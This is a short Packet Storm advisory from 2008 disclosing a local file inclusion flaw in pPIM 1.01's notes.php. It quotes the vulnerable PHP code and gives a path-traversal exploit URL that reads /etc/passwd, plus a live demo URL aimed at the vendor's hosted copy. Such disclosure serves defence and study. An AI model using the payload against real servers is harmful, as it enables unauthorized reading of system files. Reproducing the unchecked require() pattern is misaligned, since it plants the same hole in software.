ppim-lfi.txt

2008-10-07T00:00:00
ID PACKETSTORM:70654
Type packetstorm
Reporter JosS
Modified 2008-10-07T00:00:00

Description

                                        
                                            `# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability  
# url: http://www.phlatline.org/docs/files/ppim.zip  
#  
# Author: JosS  
# mail: sys-project[at]hotmail[dot]com  
# site: http://spanish-hackers.com  
# team: Spanish Hackers Team - [SHT]  
#  
# This was written for educational purpose. Use it at your own risk.  
# Author will be not responsible for any damage.  
  
  
description of vulnerability:  
-----------------------------------------------  
the variable 'id' has been not defined in code   
and the variable 'id' is sent by the users.  
-----------------------------------------------  
  
vuln file: notes.php  
  
vuln code:  
x: >...  
107: if (isset($_GET["mode"]))  
  
{  
  
if ($_GET["mode"]=="edit")  
  
{  
  
if (isset($_GET['id']))  
  
{  
  
$notefile = $_GET['id'];  
  
if ($notefile == "new")  
  
{  
  
$title = "";  
  
$notes = "";  
  
}  
  
else  
  
{  
  
$temp = "notes/" . $notefile;  
  
require($temp);  
  
123: }  
x: <...  
x: }}}  
  
exploit: GET /notes.php?mode=edit&id=[file]  
sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd  
  
live demo:  
http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php  
  
  
`